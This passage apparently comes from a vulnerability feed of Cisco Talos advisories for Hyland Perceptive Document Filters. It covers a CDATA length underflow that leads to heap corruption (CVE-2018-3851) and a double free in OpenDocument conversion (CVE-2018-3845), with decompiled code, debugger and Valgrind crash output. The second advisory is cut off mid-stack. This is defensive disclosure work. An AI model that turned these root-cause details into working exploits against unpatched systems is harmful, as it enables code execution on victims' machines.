CDATAElement[2] == 'C'\n Line 11 && CDATAElement[3] == 'D'\n Line 12 && CDATAElement[4] == 'A'\n Line 13 && CDATAElement[5] == 'T'\n Line 14 && CDATAElement[6] == 'A'\n Line 15 && CDATAElement[7] == '[' )\n Line 16 {\n Line 17 CDATAElementTextBeg = CDATAElement + 8;\n Line 18 v48 = (ISYS_NS::XML::XMLNode *)ISYS_NS::XML::CXMLDocumentImpl::addNode(this, &byte_F64729AE, 0, 3, v45);\n Line 19 v26 = CDATAElement[8];\n Line 20 if ( !v26 )\n Line 21 {\n Line 22 v28 = CDATAElement + 8;\n Line 23 v39 = 0;\n Line 24 LABEL_91:\n Line 25 ISYS_NS::XML::CXMLDocumentImpl::setTextContent(this, v48, CDATAElementTextBeg, v39, 0);\n Line 26 goto LABEL_87;\n Line 27 }\n Line 28 CDATAElementTextEnd = CDATAElement + 8;\n Line 29 while ( 2 )\n Line 30 {\n Line 31 if ( v26 == ']' )\n Line 32 {\n Line 33 v28 = CDATAElementTextEnd + 1;\n Line 34 if ( CDATAElementTextEnd[1] != ']' )\n Line 35 goto LABEL_49;\n Line 36 if ( CDATAElementTextEnd[2] == '>' )\n Line 37 {\n Line 38 ISYS_NS::XML::CXMLDocumentImpl::setTextContent(\n Line 39 this,\n Line 40 v48,\n Line 41 CDATAElementTextBeg,\n Line 42 CDATAElementTextEnd - 1 - CDATAElementTextBeg,\n Line 43 0);\n Line 44 v28 = CDATAElementTextEnd + 2;\n Line 45 LABEL_87:\n Line 46 v45 = (ISYS_NS::XML::XMLNode *)*((_DWORD *)v48 + 1);\n Line 47 v2 = v28 + 1;\n Line 48 goto LABEL_9;\n Line 49 }\n Line 50 }\n Line 51 else\n Line 52 {\n Line 53 v28 = CDATAElementTextEnd + 1;\n Line 54 LABEL_49:\n Line 55 v26 = *v28;\n Line 56 if ( !*v28 )\n Line 57 {\n Line 58 v39 = v28 - CDATAElementTextBeg;\n Line 59 goto LABEL_91;\n Line 60 }\n Line 61 }\n Line 62 CDATAElementTextEnd = v28;\n Line 63 continue;\n Line 64 }\n Line 65 }\n \n\nThe `memcpy` `size` parameter value is calculated at `line 43` which is an argument for the `ISYS_NS::XML::CXMLDocumentImpl::setTextContent` function call. Generally speaking, this fragment of code is responsible for finding the `CDATA` section in an XML document and measuring the text length that this section contains. In our example the `CDATA` section does not contain any text, so the calculations made at `line 43` where:\n \n \n CDATAElementTextBeg == CDATAElementTextEnd\n \n\nwill end up with a value equal `-1`. Later, as we saw above, so huge unsigned value is used in the `memcpy` operation leads to heap corruption and which an attacker could potentially leverage to gain remote code execution.\n\n### Crash Information\n \n \n File type: Microsoft Word (25); Capabilities: 3 - malformed_doc.xml\n ==85982== Invalid read of size 2\n ==85982== at 0x4030F1C: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A4BF: ISYS_NS::CMSWord2003XML::needFileList() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A6A8: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== Address 0x6b3e846 is 510 bytes inside a block of size 511 alloc'd\n ==85982== at 0x402C6BC: operator new(unsigned int) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x61B9D45: std::string::_Rep::_S_create(unsigned int, unsigned int, std::allocator<char> const&) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BAF18: std::string::_Rep::_M_clone(std::allocator<char> const&, unsigned int) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BAFD9: std::string::reserve(unsigned int) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BB48B: std::string::append(unsigned int, char) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BB569: std::string::resize(unsigned int, char) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x41DB027: ISYS_NS::XML::CXMLDocument::load(ISYS_NS::CStream*, ISYS_NS::XML::XML_ENCODING) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x43391B9: ISYS_NS::CMSOfficeXML::CMSOfficeXML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A661: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== \n ==85982== Invalid read of size 2\n ==85982== at 0x4030F10: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A4BF: ISYS_NS::CMSWord2003XML::needFileList() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A6A8: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== Address 0x6b3e848 is 1 bytes after a block of size 511 alloc'd\n ==85982== at 0x402C6BC: operator new(unsigned int) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x61B9D45: std::string::_Rep::_S_create(unsigned int, unsigned int, std::allocator<char> const&) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BAF18: std::string::_Rep::_M_clone(std::allocator<char> const&, unsigned int) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BAFD9: std::string::reserve(unsigned int) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BB48B: std::string::append(unsigned int, char) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x61BB569: std::string::resize(unsigned int, char) (in /usr/lib/i386-linux-gnu/libstdc++.so.6.0.21)\n ==85982== by 0x41DB027: ISYS_NS::XML::CXMLDocument::load(ISYS_NS::CStream*, ISYS_NS::XML::XML_ENCODING) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x43391B9: ISYS_NS::CMSOfficeXML::CMSOfficeXML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A661: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== \n ==85982== Invalid write of size 2\n ==85982== at 0x4030F13: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A4BF: ISYS_NS::CMSWord2003XML::needFileList() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A6A8: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== Address 0x6b42980 is 0 bytes after a block of size 8,192 alloc'd\n ==85982== at 0x402C17C: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x4221DAB: ISYS_NS::CMemoryStream::_malloc(unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4221E0F: ISYS_NS::CMemoryStream::Realloc(unsigned int*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4221ED6: ISYS_NS::CMemoryStream::SetCapacity(unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x422205C: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC7AC: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A4BF: ISYS_NS::CMSWord2003XML::needFileList() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A6A8: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== \n ==85982== \n ==85982== Process terminating with default action of signal 11 (SIGSEGV)\n ==85982== Bad permissions for mapped region at address 0x7140000\n ==85982== at 0x4030F13: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A4BF: ISYS_NS::CMSWord2003XML::needFileList() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x433A6A8: ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x7186ECB: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x7187EF4: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== by 0x731720E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==85982== Invalid read of size 4\n ==85982== at 0x63D2015: tdestroy_recurse (tsearch.c:639)\n ==85982== by 0x63D202D: tdestroy_recurse (tsearch.c:640)\n ==85982== by 0x6431977: free_mem (in /lib/i386-linux-gnu/libc-2.23.so)\n ==85982== by 0x6431B09: __libc_freeres (in /lib/i386-linux-gnu/libc-2.23.so)\n ==85982== by 0x4026506: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-x86-linux.so)\n ==85982== by 0xFFFFFFFB: ???\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== Address 0x1b54 is not stack'd, malloc'd or (recently) free'd\n ==85982== \n ==85982== \n ==85982== Process terminating with default action of signal 11 (SIGSEGV)\n ==85982== Access not within mapped region at address 0x1B54\n ==85982== at 0x63D2015: tdestroy_recurse (tsearch.c:639)\n ==85982== by 0x63D202D: tdestroy_recurse (tsearch.c:640)\n ==85982== by 0x6431977: free_mem (in /lib/i386-linux-gnu/libc-2.23.so)\n ==85982== by 0x6431B09: __libc_freeres (in /lib/i386-linux-gnu/libc-2.23.so)\n ==85982== by 0x4026506: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-x86-linux.so)\n ==85982== by 0xFFFFFFFB: ???\n ==85982== by 0x4221FEE: ISYS_NS::CMemoryStream::Write(void const*, unsigned int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DCC74: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41DC92E: ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x41D8814: ISYS_NS::XML::XMLNode::xml(std::string&) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== by 0x4343E9D: ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSshared.so)\n ==85982== If you believe this happened as a result of a stack\n ==85982== overflow in your program's main thread (unlikely but\n ==85982== possible), you can try to increase the size of the\n ==85982== main thread stack using the --main-stacksize= flag.\n ==85982== The main thread stack size used in this run was 8388608.\n ==85982== \n ==85982== HEAP SUMMARY:\n ==85982== in use at exit: 788,001 bytes in 10,974 blocks\n ==85982== total heap usage: 57,614 allocs, 46,640 frees, 22,967,606 bytes allocated\n ==85982== \n ==85982== LEAK SUMMARY:\n ==85982== definitely lost: 195,319 bytes in 3,959 blocks\n ==85982== indirectly lost: 215,017 bytes in 5,663 blocks\n ==85982== possibly lost: 44,931 bytes in 657 blocks\n ==85982== still reachable: 332,734 bytes in 695 blocks\n ==85982== of which reachable via heuristic:\n ==85982== stdstring : 8,026 bytes in 399 blocks\n ==85982== suppressed: 0 bytes in 0 blocks\n ==85982== Rerun with --leak-check=full to see details of leaked memory\n ==85982== \n ==85982== For counts of detected and suppressed errors, rerun with: -v\n ==85982== ERROR SUMMARY: 9016847 errors from 4 contexts (suppressed: 0 from 0)\n \n\n### Timeline\n\n2018-02-27 - Vendor Disclosure \n2018-03-22 - Vendor patched \n2018-04-26 - Public Release\n\n##### Credit\n\nDiscovered by Marcin 'Icewall' Noga of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0538\n\nPrevious Report\n\nTALOS-2018-0528\n", "edition": 1, "reporter": "Talos Intelligence", "published": "2018-04-26T00:00:00", "title": "Hyland Perceptive Document Filters Microsoft Word CDATA Code Execution Vulnerability", "type": "talos", "enchantments": {}, "bulletinFamily": "info", "cvelist": ["CVE-2018-3851"], "modified": "2018-04-26T00:00:00", "id": "TALOS-2018-0534", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0534", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T17:44:57", "references": [], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0528\n\n## Hyland Perceptive Document Filters OpenDocument to JPEG conversion SkCanvas Code Execution vulnerability\n\n##### April 26, 2018\n\n##### CVE Number\n\nCVE-2018-3845\n\n### Summary\n\nAn exploitable double free exists in the OpenDocument to JPEG conversion functionality of the Hyland Perspective Document Filters version 11.4.0.2647. A crafted OpenDocument document can lead to a SkCanvas object double free resulting in direct code execution.\n\n### Tested Versions\n\nPerceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux\n\n### Product URLs\n\n<https://www.hyland.com/en/perceptive#docfilters>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-415: Double Free\n\n### Details\n \n \n This vulnerability is present in the Hyland Document filter conversion which is used for big data, eDiscovery, DLP, email archival, content management, business intelligence and intelligent capture services. \n \n\nIt can convert common formats such as Microsoft's document formats into more usable and easily viewed formats. There is a vulnerability in the conversion process of an OpenDocument document to JPEG. A specially crafted OpenDocument file can lead to a SkCanvas object double free and remote code execution. Let\u2019s investigate this vulnerability. After we attempt to convert a malicious OpenDocument using the Hyland library we see the following state:\n \n \n //page heap is turned on +hpa\n windbg.exe isys_doc2text.exe --jpg malicious_opendocument\n \n (4c0.1e70): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=00f5e788 ebx=00000000 ecx=10f06f00 edx=02000000 esi=1056ef98 edi=10570ff0\n eip=6235cfd1 esp=00f5e770 ebp=00f5e794 iopl=0 nv up ei pl nz na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206\n ISYSreadershd!IGR_ImageExport+0xe7f71:\n 6235cfd1 8b01 mov eax,dword ptr [ecx] ds:002b:10f06f00=????????\n \n\nShowing more context\n \n \n 0:000> u eip-5\n ISYSreadershd!IGR_ImageExport+0xe7f6c:\n 6235cfcc 0c85 or al,85h\n 6235cfce c9 leave\n 6235cfcf 7406 je ISYSreadershd!IGR_ImageExport+0xe7f77 (6235cfd7)\n 6235cfd1 8b01 mov eax,dword ptr [ecx]\n 6235cfd3 6a01 push 1\n 6235cfd5 ff10 call dword ptr [eax]\n 6235cfd7 8b7e08 mov edi,dword ptr [esi+8]\n 6235cfda 85ff test edi,edi\n \n\nWe see an obvious attempt of a virtual function call on a previously freed object. Further examination confirms our assumptions:\n \n \n 0:000> !heap -p -a ecx\n address 10f06f00 found in\n _DPH_HEAP_ROOT @ 78f1000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 12da9af8: 10f06000 2000\n 6329ab22 verifier!AVrfDebugPageHeapFree+0x000000c2\n 77045918 ntdll!RtlDebugFreeHeap+0x0000003c\n 76ff5be1 ntdll!RtlpFreeHeap+0x00056161\n 76f9fa0d ntdll!RtlFreeHeap+0x000007cd\n 62676591 ISYSreadershd!IGR_ImageExport+0x00401531\n 62640792 ISYSreadershd!IGR_ImageExport+0x003cb732\n 623d973c ISYSreadershd!IGR_ImageExport+0x001646dc\n 61e0eb4c ISYSreadershd+0x0003eb4c\n 622a628e ISYSreadershd!IGR_ImageExport+0x0003122e\n 622a5ed3 ISYSreadershd!IGR_ImageExport+0x00030e73\n 6233d6c4 ISYSreadershd!IGR_ImageExport+0x000c8664\n 622ac13f ISYSreadershd!IGR_ImageExport+0x000370df\n 622ac3c0 ISYSreadershd!IGR_ImageExport+0x00037360\n 622acb3b ISYSreadershd!IGR_ImageExport+0x00037adb\n 622abe79 ISYSreadershd!IGR_ImageExport+0x00036e19\n 622673e4 ISYSreadershd!ISYS_GetHeapHandle+0x000ea7e4\n 62d441fa isysreaders+0x001d41fa\n 631cef8f ISYS11df!IGR_Render_Page+0x0000005f\n 0037a2c8 isys_doc2text+0x0002a2c8\n 003771fb isys_doc2text+0x000271fb\n 0037612f isys_doc2text+0x0002612f\n 003a4c52 isys_doc2text+0x00054c52\n 003a2cc5 isys_doc2text+0x00052cc5\n 0037cf76 isys_doc2text+0x0002cf76\n 00457f44 isys_doc2text+0x00107f44\n 751c8654 KERNEL32!BaseThreadInitThunk+0x00000024\n 76fc4a77 ntdll!__RtlUserThreadStart+0x0000002f\n 76fc4a47 ntdll!_RtlUserThreadStart+0x0000001b\n \n\nChecking the Linux version we can obtain a bit more information from partial-symbols :\n \n \n image base :\n 0xf4a9b000 0xf54c5000 r-xp /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so\n \n [----------------------------------registers-----------------------------------]\n EAX: 0xf5c45968 --> 0xf5c45960 --> 0xf5c45958 --> 0x8a0f000 --> 0x0 \n EBX: 0xf54dff0c --> 0xa42fcc \n ECX: 0x8a17e1c --> 0x0 \n EDX: 0x8a17c08 --> 0xf5c45968 --> 0xf5c45960 --> 0xf5c45958 --> 0x8a0f000 --> 0x0 \n ESI: 0x8a17e18 --> 0xf54da798 --> 0xf51e89d0 --> 0x83e58955 \n EDI: 0x8a16300 --> 0xf54da780 --> 0xf51f0770 --> 0x57e58955 \n EBP: 0xffa1e4a8 --> 0xffa1e4c8 --> 0xffa1e4e8 --> 0xffa1e508 --> 0xffa1e528 --> 0xffa1e578 (--> ...)\n ESP: 0xffa1e480 --> 0x8a17c08 --> 0xf5c45968 --> 0xf5c45960 --> 0xf5c45958 --> 0x8a0f000 (--> ...)\n EIP: 0xf51f06c0 --> 0x830450ff\n EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0xf51f06ba: sub esp,0xc\n 0xf51f06bd: mov eax,DWORD PTR [edx]\n 0xf51f06bf: push edx\n => 0xf51f06c0: call DWORD PTR [eax+0x4]\n 0xf51f06c3: add esp,0x10\n 0xf51f06c6: mov esi,DWORD PTR [edi+0x4]\n 0xf51f06c9: test esi,esi\n 0xf51f06cb: je 0xf51f06e1\n Guessed arguments:\n arg[0]: 0x8a17c08 --> 0xf5c45968 --> 0xf5c45960 --> 0xf5c45958 --> 0x8a0f000 --> 0x0 \n \n \n \n //Double Free call stack\n #0 0xf51f06bf in 